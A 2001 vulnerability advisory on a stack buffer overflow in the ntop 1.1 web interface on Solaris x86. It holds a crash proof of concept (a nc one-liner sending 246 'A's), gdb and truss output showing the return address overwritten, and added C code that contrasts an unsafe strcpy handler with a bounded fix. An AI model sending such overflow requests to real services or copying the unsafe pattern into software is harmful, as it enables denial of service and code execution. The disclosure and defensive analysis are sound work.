======================================================================
Remote Buffer Overflow Under Solaris_x86
NTOP - Network Monitor vulnerable to compromise the system

Author: alt3kx!
Alternative:
Date: 2001-05-23
Site: www.raza-mexicana.org
Greet to: _0x90_, Dex, PaTa, Rebel and S0r from AR & Spain
Teams: Raregazz - X-ploit and S0d, in special to White-B
======================================================================

------------------------=[Brief Description]=-------------------------

A buffer overflow exists at around 300 characters: when a request of that length is sent to the port the daemon is running on (port 8080 in this case), a user can execute malicious code to obtain high privileges.

--------------------------=[Platforms]=--------------------------

Sun Solaris 7.0_x86
Sun Solaris 2.6_x86

---------------------------=[Summary]=----------------------------

Proof of concept:

# ls -la /opt/ntop/bin/ntop
-rwsr-xr-x   1 bin      bin       249680 May  3  1999 /opt/ntop/bin/ntop
#

Step one: run the ntop daemon as root

# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
.
.
.
.
.

Step two: run the following as a normal user:

[local]:alt3kx# printf "GET /`perl -e 'print "A"x245'`\r\n\r\n" |nc localhost 8080
HTTP/1.0 200 OK
Server: ntop/1.1 (i386-pc-solaris2.7)
Content-type: text/html

Unable to find information related to hostAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> FRESH CONTENT=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Generated by ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0
© 1998-99 by L. Deri
[local]:alt3kx#

SUCKS!!! NOT FUNCTIONALITY, AGAIN with more A's :-)

[local]:alt3kx# printf "GET /`perl -e 'print "A"x246'`\r\n\r\n" |nc localhost 8080
[local]:alt3kx#

In the other shell you can see this:

# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
Segmentation Fault(coredump)
#

[local]:alt3kx# gdb ntop --core=core
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-pc-solaris2.7"...
Core was generated by `ntop'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /lib/libsocket.so.1...done.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /lib/libgen.so.1...done.
Reading symbols from /lib/libc.so.1...done.
Reading symbols from /lib/libdl.so.1...done.
Reading symbols from /lib/libmp.so.2...done.
#0  0x41414141 in ?? ()
(gdb) info all-registers
eax            0x1      1
ecx            0xdffe19c8       -536995384
edx            0x20a    522
ebx            0x80cef44        135065412
esp            0x8046f14        0x8046f14
ebp            0x41414141       0x41414141
esi            0xc8     200
edi            0x80980f5        134840565
eip            0x41414141       0x41414141
eflags         0x10206  66054
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x0      0
(gdb)

Both ebp and eip hold 0x41414141 ("AAAA"): the 246-byte path has overwritten the saved frame pointer and the return address on the stack, so the daemon tries to continue execution at an address taken from the request.

[local]:alt3kx# truss /opt/ntop/bin/ntop
open("/dev/zero", O_RDONLY)                     = 3
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xDFFE1000
sysconfig(_CONFIG_PAGESIZE)                     = 4096
open("./libsocket.so.1", O_RDONLY)              Err#2 ENOENT
open("/lib/libsocket.so.1", O_RDONLY)           = 4
fxstat(2, 4, 0x08047138)                        = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFDF000
mmap(0x00000000, 40960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFD4000
mmap(0xDFFDC000, 5712, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xDFFDC000
close(4)                                        = 0
open("./libnsl.so.1", O_RDONLY)                 Err#2 ENOENT
open("/lib/libnsl.so.1", O_RDONLY)              = 4
fxstat(2, 4, 0x08047138)                        = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) = 0xDFFDF000
mmap(0x00000000, 503808, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF58000
mmap(0xDFFC5000, 23248, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 442368) = 0xDFFC5000
mmap(0xDFFCB000, 29472, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFFCB000
close(4)                                        = 0
open("./libgen.so.1", O_RDONLY)                 Err#2 ENOENT
open("/lib/libgen.so.1", O_RDONLY)              = 4
fxstat(2, 4, 0x08047138)                        = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) = 0xDFFDF000
mmap(0x00000000, 32768, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF4F000
mmap(0xDFF55000, 4184, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 20480) = 0xDFF55000
close(4)                                        = 0
open("./libc.so.1", O_RDONLY)                   Err#2 ENOENT
open("/lib/libc.so.1", O_RDONLY)                = 4
fxstat(2, 4, 0x08047138)                        = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) = 0xDFFDF000
mmap(0x00000000, 593920, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBD000
mmap(0xDFF46000, 25448, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 557056) = 0xDFF46000
mmap(0xDFF4D000, 3316, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFF4D000
close(4)                                        = 0
open("./libdl.so.1", O_RDONLY)                  Err#2 ENOENT
open("/lib/libdl.so.1", O_RDONLY)               = 4
fxstat(2, 4, 0x08047138)                        = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) = 0xDFFDF000
close(4)                                        = 0
open("./libmp.so.2", O_RDONLY)                  Err#2 ENOENT
open("/lib/libmp.so.2", O_RDONLY)               = 4
fxstat(2, 4, 0x08047138)                        = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBB000
mmap(0x00000000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEB6000
mmap(0xDFEB9000, 2524, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xDFEB9000
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xDFEB4000
close(4)                                        = 0
close(3)                                        = 0
[...............]
door_info(3, 0x08044528)                        = 0
door_call(3, 0x08044510)                        = 0
door_info(3, 0x080465E0)                        = 0
door_call(3, 0x080465C8)                        = 0
door_info(3, 0x080465E0)                        = 0
door_call(3, 0x080465C8)                        = 0
door_info(3, 0x080465E0)                        = 0
door_call(3, 0x080465C8)                        = 0
    Incurred fault #6, FLTBOUNDS  %pc = 0x41414141
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
    Received signal #11, SIGSEGV [default]
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
        *** process killed ***

bug discovered by alt3kx! & Possible C0de coming soon .... je :-)

---------------------------=[PATCH]=-----------------------------

Download the latest packages from Sun Microsystems

-------------------------=[Company Compromise]=-------------------

http://www.sun.com
http://www.ntop.org
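The following is an added illustration of the bug class behind this advisory and of the bounded parsing that prevents it; it is not ntop's code and not part of the original advisory. The advisory gives the crash threshold (245 bytes answered, 246 bytes crashed) but not ntop's real buffer size, so HOST_MAX, the function names (unsafe_lookup, parse_request_target, safe_lookup, check_request_of_length) and the request builder are all assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical buffer size for illustration only. The advisory shows the
 * crash at a 246-byte request path but does not give ntop's actual size.
 */
#define HOST_MAX 64

/*
 * The bug class the advisory describes, in its simplest form: the request
 * target is copied into a fixed-size stack buffer with no length check. A long
 * enough target runs past the buffer into the saved frame pointer and return
 * address, which is why the core dump shows ebp and eip as 0x41414141.
 * Kept here for contrast only; nothing in this file calls it.
 */
void unsafe_lookup(const char *target) {
    char host[HOST_MAX];
    strcpy(host, target);   /* unbounded: overflows once strlen(target) >= HOST_MAX */
    printf("Unable to find information related to host %s\n", host);
}

/*
 * Bounded replacement. Extracts the target from "GET <target> HTTP/1.x" into a
 * caller-supplied buffer and refuses anything that would not fit with its NUL.
 * Returns 0 on success, -1 on a malformed request or an over-long target.
 */
int parse_request_target(const char *request, char *out, size_t outlen) {
    const char *p;
    size_t len;

    if (request == NULL || out == NULL || outlen == 0)
        return -1;
    if (strncmp(request, "GET ", 4) != 0)
        return -1;
    p = request + 4;
    len = strcspn(p, " \r\n");      /* target ends at the first space or line end */
    if (len == 0 || len >= outlen)  /* empty, or no room for the terminating NUL */
        return -1;
    memcpy(out, p, len);
    out[len] = '\0';
    return 0;
}

/* Safe handler: same lookup message as ntop's reply, but the copy is bounded. */
int safe_lookup(const char *request) {
    char host[HOST_MAX];

    if (parse_request_target(request, host, sizeof host) != 0) {
        printf("Request rejected: target missing or longer than %d bytes\n",
               HOST_MAX - 1);
        return -1;
    }
    printf("Unable to find information related to host %s\n", host);
    return 0;
}

/*
 * Builds a constructed request of the shape the advisory sends, "GET /" followed
 * by n 'A' characters, and runs it through the safe handler. Returns the
 * handler's result: 0 when the target fits, -1 when it is rejected.
 */
int check_request_of_length(size_t n) {
    char req[512];
    size_t i;

    if (n > sizeof req - 10)        /* "GET /" + n + "\r\n\r\n" + NUL must fit */
        return -1;
    memcpy(req, "GET /", 5);
    for (i = 0; i < n; i++)
        req[5 + i] = 'A';
    memcpy(req + 5 + n, "\r\n\r\n", 5);  /* 5 bytes copies the NUL as well */
    return safe_lookup(req);
}

int main(void) {
    size_t lengths[] = { 10, 62, 63, 245, 246 };
    size_t i;

    for (i = 0; i < sizeof lengths / sizeof lengths[0]; i++)
        printf("n=%zu -> %d\n", lengths[i], check_request_of_length(lengths[i]));
    return 0;
}
```

With the hypothetical 64-byte buffer the bounded handler accepts a 62-character run of A's and rejects 63 and above, including both lengths from the advisory, instead of overwriting the stack. Two points from the advisory's own output are worth keeping in mind when assessing exposure: the daemon in the proof of concept is started by root, and the ls listing shows the binary set-uid to bin, so a crash or code execution happens with more than the requesting user's privileges. A core dump whose eip is 0x41414141 (or any other byte pattern from a request) is the signal to look for when triaging a daemon crash; the fix remains the vendor update named in the PATCH section.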